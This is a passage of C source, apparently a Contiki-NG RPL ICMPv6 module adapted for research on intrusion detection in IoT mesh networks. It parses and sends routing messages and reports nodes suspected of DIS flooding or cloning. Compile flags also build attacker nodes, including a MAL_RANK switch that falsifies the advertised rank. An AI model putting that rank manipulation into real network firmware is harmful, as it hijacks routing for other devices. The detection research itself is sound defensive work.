nodes[NODES_NUM_CL];\n\nNBR_TABLE_GLOBAL(fw_stats, nbr_fw_stats);\n#elif IDS_SERVER == 1\nuint32_t BR_last_time_from_ids=0;\nuint16_t detectorsIP[DETECTORS_NUM];\n//Average time,number of DIS for IDS\nextern ids_ctr_t nodes[NODES_NUM];\n#endif /*IDS_SERVER*/\n\n#if MAL_EXT\n//Malicious flag ext\nextern char flag_ext;\n#endif\n\n/*---------------------------------------------------------------------------*/\n/* Initialize RPL ICMPv6 message handlers */\nUIP_ICMP6_HANDLER(dis_handler, ICMP6_RPL, RPL_CODE_DIS, dis_input);\nUIP_ICMP6_HANDLER(dio_handler, ICMP6_RPL, RPL_CODE_DIO, dio_input);\nUIP_ICMP6_HANDLER(dao_handler, ICMP6_RPL, RPL_CODE_DAO, dao_input);\n\n#if MAL_EXT\n//Malicious input handler\nUIP_ICMP6_HANDLER(mal_handler, ICMP6_RPL, RPL_CODE_MAL, mal_input);\n#endif\n\n#if IDS_CLIENT==1 || IDS_SERVER == 1\nUIP_ICMP6_HANDLER(ids_handler, ICMP6_RPL, RPL_CODE_IDS, ids_input);\n\n#endif /*IDS_CLIENT*/\n\n#if IDS_SERVER == 1\nUIP_ICMP6_HANDLER(ids_BH_handler, ICMP6_RPL, RPL_CODE_IDS2, ids_blackhole_input);\n#endif /*IDS_CLIENT*/\n\n#if IDS_CLIENT==0 && IDS_SERVER == 0 && !MALICIOUS && !CLONE_ATTACK && IDS_OF\n//Add handler for message from ids to normal node\nUIP_ICMP6_HANDLER(ids_to_normal_handler, ICMP6_RPL, RPL_CODE_IDS_NORM, ids_input_benign);\n#endif\n\n#if RPL_WITH_DAO_ACK\nstatic void dao_ack_input(void);\nUIP_ICMP6_HANDLER(dao_ack_handler, ICMP6_RPL, RPL_CODE_DAO_ACK, dao_ack_input);\n#endif /* RPL_WITH_DAO_ACK */\n\n/*---------------------------------------------------------------------------*/\nstatic uint32_t\nget32(uint8_t *buffer, int pos)\n{\n return ((uint32_t)buffer[pos] << 24 | (uint32_t)buffer[pos + 1] << 16 |\n (uint32_t)buffer[pos + 2] << 8 | buffer[pos + 3]);\n}\n/*---------------------------------------------------------------------------*/\nstatic void\nset32(uint8_t *buffer, int pos, uint32_t value)\n{\n buffer[pos++] = value >> 24;\n buffer[pos++] = (value >> 16) & 0xff;\n buffer[pos++] = (value >> 8) & 0xff;\n buffer[pos++] = value & 0xff;\n}\n/*---------------------------------------------------------------------------*/\nstatic uint16_t\nget16(uint8_t *buffer, int pos)\n{\n return (uint16_t)buffer[pos] << 8 | buffer[pos + 1];\n}\n/*---------------------------------------------------------------------------*/\nstatic void\nset16(uint8_t *buffer, int pos, uint16_t value)\n{\n buffer[pos++] = value >> 8;\n buffer[pos++] = value & 0xff;\n}\n/*---------------------------------------------------------------------------*/\nuip_ds6_nbr_t *\nrpl_icmp6_update_nbr_table(uip_ipaddr_t *from, nbr_table_reason_t reason, void *data)\n{\n uip_ds6_nbr_t *nbr;\n\n if ((nbr = uip_ds6_nbr_lookup(from)) == NULL)\n {\n if ((nbr = uip_ds6_nbr_add(from, (uip_lladdr_t *)packetbuf_addr(PACKETBUF_ADDR_SENDER),\n 0, NBR_REACHABLE, reason, data)) == NULL)\n {\n LOG_ERR(\"could not add neighbor to cache \");\n LOG_ERR_6ADDR(from);\n LOG_ERR_(\", \");\n LOG_ERR_LLADDR(packetbuf_addr(PACKETBUF_ADDR_SENDER));\n LOG_ERR_(\"\\n\");\n }\n }\n\n return nbr;\n}\n/*---------------------------------------------------------------------------*/\nstatic void\ndis_input(void)\n{\n\n // #if IDS_CLIENT || IDS_SERVER\n // unsigned char *buffer;\n // buffer=UIP_ICMP_PAYLOAD;\n // char flag_ids=buffer[1];\n \n // #endif\n\n if (!curr_instance.used)\n {\n LOG_WARN(\"dis_input: not in an instance yet, discard\\n\");\n goto discard;\n }\n\n \n LOG_INFO(\"received a DIS from \");\n LOG_INFO_6ADDR(&UIP_IP_BUF->srcipaddr);\n LOG_INFO_(\"\\n\");\n\n// #if IDS_CLIENT\n// unsigned char *buffer;\n// 
buffer=UIP_ICMP_PAYLOAD;\n// if (buffer[1]==2){\n// flag_is_ids=2;\n// LOG_INFO(\"enn\\n\");\n// rpl_process_dis(&UIP_IP_BUF->srcipaddr, uip_is_addr_mcast(&UIP_IP_BUF->destipaddr));\n// //rpl_process_dis(&UIP_IP_BUF->srcipaddr,0);\n// }\n// #else\n rpl_process_dis(&UIP_IP_BUF->srcipaddr, uip_is_addr_mcast(&UIP_IP_BUF->destipaddr));\n // #endif\n\ndiscard:\n uipbuf_clear();\n}\n/*---------------------------------------------------------------------------*/\nvoid rpl_icmp6_dis_output(uip_ipaddr_t *addr)\n{\n unsigned char *buffer;\n\n /* Make sure we're up-to-date before sending data out */\n rpl_dag_update_state();\n\n buffer = UIP_ICMP_PAYLOAD;\n buffer[0] = buffer[1] = 0;\n\n #if IDS_CLIENT==1\n //overwrite reserve fields in DIS object for IDS\n // LOG_INFO(\"send as ids\\n\");\n \n buffer[1]=0x02;\n #endif\n\n if (addr == NULL)\n {\n addr = &rpl_multicast_addr;\n }\n\n LOG_INFO(\"sending a DIS to \");\n LOG_INFO_6ADDR(addr);\n LOG_INFO_(\"\\n\");\n\n \n uip_icmp6_send(addr, ICMP6_RPL, RPL_CODE_DIS, 2);\n \n}\n/*---------------------------------------------------------------------------*/\nstatic void\ndio_input(void)\n{\n unsigned char *buffer;\n uint8_t buffer_length;\n rpl_dio_t dio;\n uint8_t subopt_type;\n int i;\n int len;\n uip_ipaddr_t from;\n\n memset(&dio, 0, sizeof(dio));\n\n /* Set default values in case the DIO configuration option is missing. */\n dio.dag_intdoubl = RPL_DIO_INTERVAL_DOUBLINGS;\n dio.dag_intmin = RPL_DIO_INTERVAL_MIN;\n dio.dag_redund = RPL_DIO_REDUNDANCY;\n dio.dag_min_hoprankinc = RPL_MIN_HOPRANKINC;\n dio.dag_max_rankinc = RPL_MAX_RANKINC;\n dio.ocp = RPL_OF_OCP;\n dio.default_lifetime = RPL_DEFAULT_LIFETIME;\n dio.lifetime_unit = RPL_DEFAULT_LIFETIME_UNIT;\n\n uip_ipaddr_copy(&from, &UIP_IP_BUF->srcipaddr);\n\n buffer_length = uip_len - uip_l3_icmp_hdr_len;\n\n /* Process the DIO base option. */\n i = 0;\n buffer = UIP_ICMP_PAYLOAD;\n\n dio.instance_id = buffer[i++];\n dio.version = buffer[i++];\n dio.rank = get16(buffer, i);\n i += 2;\n\n dio.grounded = buffer[i] & RPL_DIO_GROUNDED;\n dio.mop = (buffer[i] & RPL_DIO_MOP_MASK) >> RPL_DIO_MOP_SHIFT;\n dio.preference = buffer[i++] & RPL_DIO_PREFERENCE_MASK;\n\n dio.dtsn = buffer[i++];\n /* two reserved bytes */\n\n \n //Get flag for IDS detectors\n // #if IDS_CLIENT==1 || IDS_SERVER == 1\n // // LOG_INFO(\"fromdiol:%d\",flag_is_ids);\n \n // uint8_t flag_ids;\n // flag_ids=buffer[i++];\n // rpl_nbr_t *nbr= rpl_neighbor_get_from_ipaddr(&from);\n // // dio.flag_ids_node=flag_ids;\n \n // if (nbr!=NULL){\n // nbr->flag_ids_node=flag_ids;\n // }\n // i+=1; //increase position\n // if (flag_ids==2)\n // LOG_INFO(\"info from ids:%d\\n\",flag_ids);\n // #else\n i+= 2;\n // #endif\n\n memcpy(&dio.dag_id, buffer + i, sizeof(dio.dag_id));\n i += sizeof(dio.dag_id);\n\n /* Check if there are any DIO suboptions. 
*/\n for (; i < buffer_length; i += len)\n {\n subopt_type = buffer[i];\n if (subopt_type == RPL_OPTION_PAD1)\n {\n len = 1;\n }\n else\n {\n /* Suboption with a two-byte header + payload */\n len = 2 + buffer[i + 1];\n }\n\n if (len + i > buffer_length)\n {\n LOG_ERR(\"dio_input: malformed packet, discard\\n\");\n goto discard;\n }\n\n switch (subopt_type)\n {\n case RPL_OPTION_DAG_METRIC_CONTAINER:\n if (len < 6)\n {\n LOG_WARN(\"dio_input: invalid DAG MC, len %u, discard\\n\", len);\n goto discard;\n }\n dio.mc.type = buffer[i + 2];\n dio.mc.flags = buffer[i + 3] << 1;\n dio.mc.flags |= buffer[i + 4] >> 7;\n dio.mc.aggr = (buffer[i + 4] >> 4) & 0x3;\n dio.mc.prec = buffer[i + 4] & 0xf;\n dio.mc.length = buffer[i + 5];\n\n if (dio.mc.type == RPL_DAG_MC_NONE)\n {\n /* No metric container: do nothing */\n }\n else if (dio.mc.type == RPL_DAG_MC_ETX)\n {\n dio.mc.obj.etx = get16(buffer, i + 6);\n }\n else if (dio.mc.type == RPL_DAG_MC_ENERGY)\n {\n dio.mc.obj.energy.flags = buffer[i + 6];\n dio.mc.obj.energy.energy_est = buffer[i + 7];\n }\n else\n {\n LOG_WARN(\"dio_input: unsupported DAG MC type %u, discard\\n\", (unsigned)dio.mc.type);\n goto discard;\n }\n break;\n case RPL_OPTION_ROUTE_INFO:\n if (len < 9)\n {\n LOG_WARN(\"dio_input: invalid destination prefix option, len %u, discard\\n\", len);\n goto discard;\n }\n\n /* The flags field includes the preference value. */\n dio.destination_prefix.length = buffer[i + 2];\n dio.destination_prefix.flags = buffer[i + 3];\n dio.destination_prefix.lifetime = get32(buffer, i + 4);\n\n if (((dio.destination_prefix.length + 7) / 8) + 8 <= len &&\n dio.destination_prefix.length <= 128)\n {\n memcpy(&dio.destination_prefix.prefix, &buffer[i + 8],\n (dio.destination_prefix.length + 7) / 8);\n }\n else\n {\n LOG_WARN(\"dio_input: invalid route info option, len %u, discard\\n\", len);\n goto discard;\n }\n\n break;\n case RPL_OPTION_DAG_CONF:\n if (len != 16)\n {\n LOG_WARN(\"dio_input: invalid DAG configuration option, len %u, discard\\n\", len);\n goto discard;\n }\n\n /* Path control field not yet implemented - at i + 2 */\n dio.dag_intdoubl = buffer[i + 3];\n dio.dag_intmin = buffer[i + 4];\n dio.dag_redund = buffer[i + 5];\n dio.dag_max_rankinc = get16(buffer, i + 6);\n dio.dag_min_hoprankinc = get16(buffer, i + 8);\n dio.ocp = get16(buffer, i + 10);\n /* buffer + 12 is reserved */\n dio.default_lifetime = buffer[i + 13];\n dio.lifetime_unit = get16(buffer, i + 14);\n break;\n case RPL_OPTION_PREFIX_INFO:\n if (len != 32)\n {\n LOG_WARN(\"dio_input: invalid DAG prefix info, len %u, discard\\n\", len);\n goto discard;\n }\n dio.prefix_info.length = buffer[i + 2];\n dio.prefix_info.flags = buffer[i + 3];\n /* valid lifetime is ingnored for now - at i + 4 */\n /* preferred lifetime stored in lifetime */\n dio.prefix_info.lifetime = get32(buffer, i + 8);\n /* 32-bit reserved at i + 12 */\n memcpy(&dio.prefix_info.prefix, &buffer[i + 16], 16);\n break;\n default:\n LOG_WARN(\"dio_input: unsupported suboption type in DIO: %u, discard\\n\", (unsigned)subopt_type);\n goto discard;\n }\n }\n\n LOG_INFO(\"received a %s-DIO from \",\n uip_is_addr_mcast(&UIP_IP_BUF->destipaddr) ? 
\"multicast\" : \"unicast\");\n LOG_INFO_6ADDR(&from);\n LOG_INFO_(\", instance_id %u, DAG ID \", (unsigned)dio.instance_id);\n LOG_INFO_6ADDR(&dio.dag_id);\n LOG_INFO_(\", version %u, dtsn %u, rank %u\\n\",\n (unsigned)dio.version,\n (unsigned)dio.dtsn,\n (unsigned)dio.rank);\n\n rpl_process_dio(&from, &dio);\n\ndiscard:\n uipbuf_clear();\n}\n/*---------------------------------------------------------------------------*/\nvoid rpl_icmp6_dio_output(uip_ipaddr_t *uc_addr)\n{\n unsigned char *buffer;\n int pos;\n uip_ipaddr_t *addr = uc_addr;\n\n /* Make sure we're up-to-date before sending data out */\n rpl_dag_update_state();\n\n \n if (rpl_get_leaf_only())\n {\n /* In leaf mode, we only send DIO messages as unicasts in response to\n unicast DIS messages. */\n if (uc_addr == NULL)\n {\n /* Do not send multicast DIO in leaf mode */\n return;\n }\n }\n \n\n /* DAG Information Object */\n pos = 0;\n\n buffer = UIP_ICMP_PAYLOAD;\n buffer[pos++] = curr_instance.instance_id;\n buffer[pos++] = curr_instance.dag.version;\n\n#if MAL_RANK\n //Modify rank\n curr_instance.dag.rank = 130;\n#endif\n\n \n if (rpl_get_leaf_only())\n {\n set16(buffer, pos, RPL_INFINITE_RANK);\n }\n else\n {\n // LOG_INFO(\"myrank:%d\\n\",curr_instance.dag.rank);\n \n set16(buffer, pos, curr_instance.dag.rank);\n }\n\n //rank for ids\n\n pos += 2;\n\n buffer[pos] = 0;\n if (curr_instance.dag.grounded)\n {\n buffer[pos] |= RPL_DIO_GROUNDED;\n }\n\n buffer[pos] |= curr_instance.mop << RPL_DIO_MOP_SHIFT;\n buffer[pos] |= curr_instance.dag.preference & RPL_DIO_PREFERENCE_MASK;\n pos++;\n\n buffer[pos++] = curr_instance.dtsn_out;\n\n /* reserved 2 bytes */\n //Use this flag for IDS to recognize detector\n #if IDS_CLIENT==1\n buffer[pos++]=0x02;\n // LOG_INFO(\"SETTING ids %d\\n\",flag_is_ids);\n #elif IDS_SERVER == 1\n // rpl_nbr_t *nbr= rpl_neighbor_get_from_ipaddr(addr);\n \n buffer[pos++]=0x02;\n if (uc_addr!=NULL)\n buffer[pos++]=flag_is_ids;\n // LOG_INFO(\"SETTING flag ids %d\\n\",flag_is_ids);\n #else\n buffer[pos]=0;\n // LOG_INFO(\"logfla:%d\",buffer[pos]);\n pos++; //flags\n #endif\n \n\n buffer[pos++] = 0; /* reserved */\n\n memcpy(buffer + pos, &curr_instance.dag.dag_id, sizeof(curr_instance.dag.dag_id));\n pos += 16;\n\n // #if IDS_CLIENT\n // if (flag_is_ids==2)\n // #else\n if (!rpl_get_leaf_only())\n {\n if (curr_instance.mc.type != RPL_DAG_MC_NONE)\n {\n buffer[pos++] = RPL_OPTION_DAG_METRIC_CONTAINER;\n buffer[pos++] = 6;\n buffer[pos++] = curr_instance.mc.type;\n buffer[pos++] = curr_instance.mc.flags >> 1;\n buffer[pos] = (curr_instance.mc.flags & 1) << 7;\n buffer[pos++] |= (curr_instance.mc.aggr << 4) | curr_instance.mc.prec;\n if (curr_instance.mc.type == RPL_DAG_MC_ETX)\n {\n buffer[pos++] = 2;\n set16(buffer, pos, curr_instance.mc.obj.etx);\n pos += 2;\n }\n else if (curr_instance.mc.type == RPL_DAG_MC_ENERGY)\n {\n buffer[pos++] = 2;\n buffer[pos++] = curr_instance.mc.obj.energy.flags;\n buffer[pos++] = curr_instance.mc.obj.energy.energy_est;\n }\n else\n {\n LOG_ERR(\"unable to send DIO because of unsupported DAG MC type %u\\n\",\n (unsigned)curr_instance.mc.type);\n return;\n }\n }\n }\n\n /* Always add a DAG configuration option. 
*/\n buffer[pos++] = RPL_OPTION_DAG_CONF;\n buffer[pos++] = 14;\n buffer[pos++] = 0; /* No Auth, PCS = 0 */\n buffer[pos++] = curr_instance.dio_intdoubl;\n buffer[pos++] = curr_instance.dio_intmin;\n buffer[pos++] = curr_instance.dio_redundancy;\n set16(buffer, pos, curr_instance.max_rankinc);\n pos += 2;\n set16(buffer, pos, curr_instance.min_hoprankinc);\n pos += 2;\n /* OCP is in the DAG_CONF option */\n set16(buffer, pos, curr_instance.of->ocp);\n pos += 2;\n buffer[pos++] = 0; /* reserved */\n buffer[pos++] = curr_instance.default_lifetime;\n set16(buffer, pos, curr_instance.lifetime_unit);\n pos += 2;\n\n /* Check if we have a prefix to send also. */\n if (curr_instance.dag.prefix_info.length > 0)\n {\n buffer[pos++] = RPL_OPTION_PREFIX_INFO;\n buffer[pos++] = 30; /* always 30 bytes + 2 long */\n buffer[pos++] = curr_instance.dag.prefix_info.length;\n buffer[pos++] = curr_instance.dag.prefix_info.flags;\n set32(buffer, pos, curr_instance.dag.prefix_info.lifetime);\n pos += 4;\n set32(buffer, pos, curr_instance.dag.prefix_info.lifetime);\n pos += 4;\n memset(&buffer[pos], 0, 4);\n pos += 4;\n memcpy(&buffer[pos], &curr_instance.dag.prefix_info.prefix, 16);\n pos += 16;\n }\n\n // #if IDS_CLIENT\n // if (flag_is_ids==2)\n // #else\n if (!rpl_get_leaf_only())\n // #endif\n {\n addr = addr != NULL ? addr : &rpl_multicast_addr;\n }\n\n LOG_INFO(\"sending a %s-DIO with rank %u to \",\n uc_addr != NULL ? \"unicast\" : \"multicast\",\n (unsigned)curr_instance.dag.rank);\n LOG_INFO_6ADDR(addr);\n LOG_INFO_(\"\\n\");\n\n uip_icmp6_send(addr, ICMP6_RPL, RPL_CODE_DIO, pos);\n}\n/*---------------------------------------------------------------------------*/\nstatic void\ndao_input(void)\n{\n struct rpl_dao dao;\n uint8_t subopt_type;\n unsigned char *buffer;\n uint8_t buffer_length;\n int pos;\n int len;\n int i;\n uip_ipaddr_t from;\n\n memset(&dao, 0, sizeof(dao));\n\n dao.instance_id = UIP_ICMP_PAYLOAD[0];\n if (!curr_instance.used || curr_instance.instance_id != dao.instance_id)\n {\n LOG_ERR(\"dao_input: unknown RPL instance %u, discard\\n\", dao.instance_id);\n goto discard;\n }\n\n uip_ipaddr_copy(&from, &UIP_IP_BUF->srcipaddr);\n memset(&dao.parent_addr, 0, 16);\n\n buffer = UIP_ICMP_PAYLOAD;\n buffer_length = uip_len - uip_l3_icmp_hdr_len;\n\n pos = 0;\n pos++; /* instance ID */\n dao.lifetime = curr_instance.default_lifetime;\n dao.flags = buffer[pos++];\n\n //Lets use reserve bit to recognize IDS, no nbr exist yet\n // #if IDS_CLIENT==1\n // char flag_ids=buffer[pos++];\n // // dao.ids_flag=flag_ids;\n // rpl_nbr_t *nbr= rpl_neighbor_get_from_ipaddr(&UIP_IP_BUF->srcipaddr);\n // if (nbr!=NULL)\n // nbr->flag_ids_node=flag_ids;\n // else\n // LOG_INFO(\"Nbr ids error\\n\");\n // #else\n pos++; /* reserved */\n // #endif\n\n dao.sequence = buffer[pos++];\n\n /* Is the DAG ID present? */\n if (dao.flags & RPL_DAO_D_FLAG)\n {\n if (memcmp(&curr_instance.dag.dag_id, &buffer[pos], sizeof(curr_instance.dag.dag_id)))\n {\n LOG_ERR(\"dao_input: different DAG ID \");\n LOG_ERR_6ADDR((uip_ipaddr_t *)&buffer[pos]);\n LOG_ERR_(\", discard\\n\");\n goto discard;\n }\n pos += 16;\n }\n\n /* Check if there are any RPL options present. */\n for (i = pos; i < buffer_length; i += len)\n {\n subopt_type = buffer[i];\n if (subopt_type == RPL_OPTION_PAD1)\n {\n len = 1;\n }\n else\n {\n /* The option consists of a two-byte header and a payload. */\n len = 2 + buffer[i + 1];\n }\n\n switch (subopt_type)\n {\n case RPL_OPTION_TARGET:\n /* Handle the target option. 
*/\n dao.prefixlen = buffer[i + 3];\n memset(&dao.prefix, 0, sizeof(dao.prefix));\n memcpy(&dao.prefix, buffer + i + 4, (dao.prefixlen + 7) / CHAR_BIT);\n break;\n case RPL_OPTION_TRANSIT:\n /* The path sequence and control are ignored. */\n /* pathcontrol = buffer[i + 3];\n pathsequence = buffer[i + 4];*/\n dao.lifetime = buffer[i + 5];\n if (len >= 20)\n {\n memcpy(&dao.parent_addr, buffer + i + 6, 16);\n }\n break;\n }\n }\n\n /* Destination Advertisement Object */\n LOG_INFO(\"received a %sDAO from \", dao.lifetime == 0 ? \"No-path \" : \"\");\n LOG_INFO_6ADDR(&UIP_IP_BUF->srcipaddr);\n LOG_INFO_(\", seqno %u, lifetime %u, prefix \", dao.sequence, dao.lifetime);\n LOG_INFO_6ADDR(&dao.prefix);\n LOG_INFO_(\", prefix length %u, parent \", dao.prefixlen);\n LOG_INFO_6ADDR(&dao.parent_addr);\n LOG_INFO_(\" \\n\");\n\n rpl_process_dao(&from, &dao);\n\ndiscard:\n uipbuf_clear();\n}\n/*---------------------------------------------------------------------------*/\nvoid rpl_icmp6_dao_output(uint8_t lifetime)\n{\n unsigned char *buffer;\n uint8_t prefixlen;\n int pos;\n const uip_ipaddr_t *prefix = rpl_get_global_address();\n uip_ipaddr_t *parent_ipaddr = rpl_neighbor_get_ipaddr(curr_instance.dag.preferred_parent);\n\n /* Make sure we're up-to-date before sending data out */\n rpl_dag_update_state();\n\n if (!curr_instance.used)\n {\n LOG_WARN(\"rpl_icmp6_dao_output: not in an instance, skip sending DAO\\n\");\n return;\n }\n\n if (curr_instance.dag.preferred_parent == NULL)\n {\n LOG_WARN(\"rpl_icmp6_dao_output: no preferred parent, skip sending DAO\\n\");\n return;\n }\n\n if (prefix == NULL || parent_ipaddr == NULL || curr_instance.mop == RPL_MOP_NO_DOWNWARD_ROUTES)\n {\n LOG_WARN(\"rpl_icmp6_dao_output: node not ready to send a DAO (prefix %p, parent addr %p, mop %u)\\n\",\n prefix, parent_ipaddr, curr_instance.mop);\n return;\n }\n\n buffer = UIP_ICMP_PAYLOAD;\n pos = 0;\n\n buffer[pos++] = curr_instance.instance_id;\n buffer[pos] = 0;\n#if RPL_WITH_DAO_ACK\n if (lifetime != 0)\n {\n buffer[pos] |= RPL_DAO_K_FLAG;\n }\n#endif /* RPL_WITH_DAO_ACK */\n \n \n ++pos; \n buffer[pos++]=0;\n buffer[pos++] = curr_instance.dag.dao_last_seqno;\n\n /* create target subopt */\n prefixlen = sizeof(*prefix) * CHAR_BIT;\n buffer[pos++] = RPL_OPTION_TARGET;\n buffer[pos++] = 2 + ((prefixlen + 7) / CHAR_BIT);\n buffer[pos++] = 0; /* reserved */\n buffer[pos++] = prefixlen;\n memcpy(buffer + pos, prefix, (prefixlen + 7) / CHAR_BIT);\n pos += ((prefixlen + 7) / CHAR_BIT);\n\n /* Create a transit information sub-option. */\n buffer[pos++] = RPL_OPTION_TRANSIT;\n buffer[pos++] = 20;\n buffer[pos++] = 0; /* flags - ignored */\n buffer[pos++] = 0; /* path control - ignored */\n buffer[pos++] = 0; /* path seq - ignored */\n buffer[pos++] = lifetime;\n\n /* Include parent global IP address */\n memcpy(buffer + pos, &curr_instance.dag.dag_id, 8); /* Prefix */\n pos += 8;\n memcpy(buffer + pos, ((const unsigned char *)parent_ipaddr) + 8, 8); /* Interface identifier */\n pos += 8;\n\n LOG_INFO(\"sending a %sDAO seqno %u, tx count %u, lifetime %u, prefix \",\n lifetime == 0 ? 
\"No-path \" : \"\",\n curr_instance.dag.dao_last_seqno, curr_instance.dag.dao_transmissions, lifetime);\n LOG_INFO_6ADDR(prefix);\n LOG_INFO_(\" to \");\n LOG_INFO_6ADDR(&curr_instance.dag.dag_id);\n LOG_INFO_(\", parent \");\n LOG_INFO_6ADDR(parent_ipaddr);\n LOG_INFO_(\"\\n\");\n\n /* Send DAO to root (IPv6 address is DAG ID) */\n uip_icmp6_send(&curr_instance.dag.dag_id, ICMP6_RPL, RPL_CODE_DAO, pos);\n}\n#if RPL_WITH_DAO_ACK\n/*---------------------------------------------------------------------------*/\nstatic void\ndao_ack_input(void)\n{\n uint8_t *buffer;\n uint8_t instance_id;\n uint8_t sequence;\n uint8_t status;\n\n buffer = UIP_ICMP_PAYLOAD;\n\n instance_id = buffer[0];\n //Get the flag for IDS detector in reserved field\n // #if IDS_CLIENT==1 || IDS_SERVER == 1\n // char flag_ids=buffer[1];\n // rpl_nbr_t *nbr= rpl_neighbor_get_from_ipaddr(&UIP_IP_BUF->srcipaddr);\n // if (nbr!=NULL)\n // nbr->flag_ids_node=flag_ids;\n\n // if (flag_ids==2)\n // LOG_INFO(\"Parsedaoack %d\\n\",flag_ids);\n // #endif\n\n sequence = buffer[2];\n status = buffer[3];\n\n if (!curr_instance.used || curr_instance.instance_id != instance_id)\n {\n LOG_ERR(\"dao_ack_input: unknown instance, discard\\n\");\n goto discard;\n }\n\n LOG_INFO(\"received a DAO-%s with seqno %d (%d %d) and status %d from \",\n status < RPL_DAO_ACK_UNABLE_TO_ACCEPT ? \"ACK\" : \"NACK\", sequence,\n curr_instance.dag.dao_last_seqno, curr_instance.dag.dao_last_seqno, status);\n LOG_INFO_6ADDR(&UIP_IP_BUF->srcipaddr);\n LOG_INFO_(\"\\n\");\n\n rpl_process_dao_ack(sequence, status);\n\ndiscard:\n uipbuf_clear();\n}\n/*---------------------------------------------------------------------------*/\nvoid rpl_icmp6_dao_ack_output(uip_ipaddr_t *dest, uint8_t sequence, uint8_t status)\n{\n unsigned char *buffer;\n\n /* Make sure we're up-to-date before sending data out */\n rpl_dag_update_state();\n\n buffer = UIP_ICMP_PAYLOAD;\n buffer[0] = curr_instance.instance_id;\n \n //IDS detector send flag in reserve bit field\n #if IDS_SERVER == 1\n // rpl_nbr_t *nbr= rpl_neighbor_get_from_ipaddr(dest);\n // if (nbr!=NULL)\n // buffer[1]=nbr->flag_ids_node;\n // else{\n buffer[1]=flag_is_ids;\n // LOG_INFO(\"No ids flag\\n\");\n \n #else\n buffer[1] = 0; /* reserved */\n #endif\n \n buffer[2] = sequence;\n buffer[3] = status;\n\n LOG_INFO(\"sending a DAO-%s seqno %d to \",\n status < RPL_DAO_ACK_UNABLE_TO_ACCEPT ? 
\"ACK\" : \"NACK\", sequence);\n LOG_INFO_6ADDR(dest);\n LOG_INFO_(\" with status %d\\n\", status);\n\n uip_icmp6_send(dest, ICMP6_RPL, RPL_CODE_DAO_ACK, 4);\n}\n#endif /* RPL_WITH_DAO_ACK */\n/*---------------------------------------------------------------------------*/\nvoid rpl_icmp6_init()\n{\n uip_icmp6_register_input_handler(&dis_handler);\n uip_icmp6_register_input_handler(&dio_handler);\n uip_icmp6_register_input_handler(&dao_handler);\n#if IDS_CLIENT==1 || IDS_SERVER == 1 /*IDS client*/\n uip_icmp6_register_input_handler(&ids_handler);\n#endif /*Only for IDS client*/\n\n#if IDS_SERVER==1\n uip_icmp6_register_input_handler(&ids_BH_handler);\n#endif\n\n#if IDS_CLIENT==0 && IDS_SERVER ==0 && MALICIOUS==0 && !CLONE_ATTACK && IDS_OF==1 /*IDS client*/\n uip_icmp6_register_input_handler(&ids_to_normal_handler);\n#endif /*Only for IDS client*/\n\n#if MAL_EXT\n uip_icmp6_register_input_handler(&mal_handler);\n#endif\n\n#if RPL_WITH_DAO_ACK\n uip_icmp6_register_input_handler(&dao_ack_handler);\n#endif /* RPL_WITH_DAO_ACK */\n}\n/*---------------------------------------------------------------------------*/\n\n//TODO: Store for 5 minutes malicious nodes and then reset stats (delete from array)\n\n#if IDS_CLIENT==1 || IDS_SERVER == 1\nvoid ids_output(uip_ipaddr_t *addr)\n{\n\n // simple_udp_sendto(&udp_conn, str, strlen(str), &dest_ipaddr);\n#if IDS_CLIENT==1\n uint16_t pos = 0;\n int k = 0;\n int16_t indexes[NODES_NUM_CL]; \n int countOutNodes = 0;\n#endif\n\n const uip_ipaddr_t *currentNodesAddr = rpl_get_global_address(); //uip_ds6_get_link_local(-1);\n\n //If border router: Do not send. Update trust at once.\n if (uip_ipaddr_cmp(addr, currentNodesAddr))\n {\n endofIP = IdsServerAddr.u8[sizeof(IdsServerAddr.u8) - 1]; \n }\n else\n {\n //Remove function to send to other nodes than root\n // if (addr->u8[sizeof(addr->u8)-1]!=1){\n // //added inint buffer\n // unsigned char *buffer;\n // buffer = UIP_ICMP_PAYLOAD;\n // // Get the number of nodes evaluated\n // uint16_t flag=1;\n // set16(buffer, pos, flag);\n // pos = pos + 2;\n // LOG_INFO(\"send simple flag\\n\");\n // uip_icmp6_send(addr, ICMP6_RPL,RPL_CODE_IDS, (2 + (flag*(sizeof(uint16_t)))));\n\n// }\n// I am Not border router.\n#if IDS_CLIENT==1\n //else{\n\n //Keep the index of malicious nodes.\n //countOutNodes=0;\n for (k = 0; k < NODES_NUM_CL; k++)\n {\n if (nodes[k].address == 0)\n continue;\n\n //Interval is 15 because formula in rpl-timers.c: expiration_time = RPL_DIS_INTERVAL / 2 + (random_rand() % (RPL_DIS_INTERVAL));\n //So DIS_INTERVAL is defined as 30 so the min allowed time is 15. 
DIS attack and Clone attacks\n \n\n if (nodes[k].spoof_suspicious == 1 || (nodes[k].intervals < 15 && nodes[k].counterDIS >= 3))\n {\n if (nodes[k].spoof_suspicious == 1)\n LOG_INFO(\"Clone attacker:%d s:%d\\n\", (unsigned)nodes[k].address, nodes[k].spoof_suspicious);\n else\n LOG_INFO(\"Maybe warn!!ID:%u total:%d dis:%d\\n\", (unsigned)nodes[k].address, (k + 1), nodes[k].counterDIS);\n\n countOutNodes = countOutNodes + 1;\n indexes[k] = 1;\n nodes[k].spoof_suspicious = 0;\n }\n }\n\n if (countOutNodes > 0)\n {\n // data_input++;\n // If no nodes are observed, do nothing.\n unsigned char *buffer;\n buffer = UIP_ICMP_PAYLOAD;\n pos = 0;\n buffer[pos++] = RPL_DEFAULT_INSTANCE; //IDS instance is 1\n // Get the number of nodes evaluated\n set16(buffer, pos, countOutNodes);\n pos = pos + sizeof(uint16_t);\n uint16_t c = 0;\n //Send list with possible malicious nodes\n for (k = 0; k < NODES_NUM_CL; k++)\n {\n // For each node observed, send its ip, count dis and other msgs.\n\n if (indexes[k] != 1)\n continue;\n else if (c >= countOutNodes)\n break;\n c += 1;\n //PRINTF(\"READY:%d %d %d\\n\",k,indexes[k],nodes[k].address);\n set16(buffer, pos, nodes[k].address);\n pos = pos + sizeof(uint16_t);\n\n set16(buffer, pos, nodes[k].counterDIS);\n pos = pos + sizeof(uint16_t);\n\n set16(buffer, pos, nodes[k].counterMsg);\n pos = pos + sizeof(uint16_t);\n\n set32(buffer, pos, nodes[k].intervals);\n //memcpy(buffer+pos,&nodes[k].intervals,4);\n pos = pos + sizeof(uint32_t);\n\n }\n LOG_PRINT(\"Send packet ids!\\n\");\n uip_icmp6_send(addr, ICMP6_RPL, RPL_CODE_IDS, 1 + sizeof(uint16_t) + (countOutNodes * (3 * sizeof(uint16_t) + sizeof(uint32_t))));\n //Send packet and reset\n //Why reset??\n // for (j=0; j<NODES_NUM_CL;j++){\n // if 